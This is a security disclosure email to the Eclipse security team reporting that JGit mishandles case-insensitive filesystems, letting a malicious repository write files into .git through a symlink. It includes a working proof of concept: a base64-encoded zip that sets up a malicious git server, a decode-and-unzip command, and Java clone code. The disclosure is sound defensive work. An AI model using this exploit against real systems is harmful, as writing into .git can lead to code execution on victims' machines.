JGit: Improper handling of case insensitive filesystems in JGit allows arbitrary file write

Report from the security@ mailing list:

RyotaK ryotak.mail@gmail.com

8:50 AM (48 minutes ago)

to security Hello Eclipse security team, I'm a security researcher who discovered a vulnerability in JGit.

In org.eclipse.jgit/src/org/eclipse/jgit/dircache/BaseDirCacheEditor.java, the following code is used to compare the name conflict.

org.eclipse.jgit/src/org/eclipse/jgit/dircache/BaseDirCacheEditor.java line 183-185

int cmp = compareSameName(
        ePath, prefixLen, ePath.length,
        nPath, prefixLen, s, m);

Because this code doesn't validate whether the filesystem is case sensitive, a malicious repository can cause unintended write to the symbolic link using conflicted filenames. For example, assuming the following two files are included in the repository, hacked will be written to the .git directory instead of the dir1 directory on the case-insensitive filesystem.

Dir1 (symbolic link to .git directory)
dir1/hacked

Steps to reproduce: Since I read that the Eclipse security team can't download attachments, I'm embedding all codes into this email.

1. Execute the following command:

echo "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"
| base64 -d > poc.zip && unzip poc.zip

2. Run docker compose up -d.
3. Execute the following Java code:

File localPath = new File("./TestRepo");
Git.cloneRepository()
  .setURI("http://localhost:18080/test.git")
  .setDirectory(localPath)
  .call();

4. Confirm that a file called .git/hacked is created.

Best regards, RyotaK

And the followup message:

I forgot to note that I only tried it on macOS, and I haven't tested
it on Windows. Please use macOS while reproducing the issue.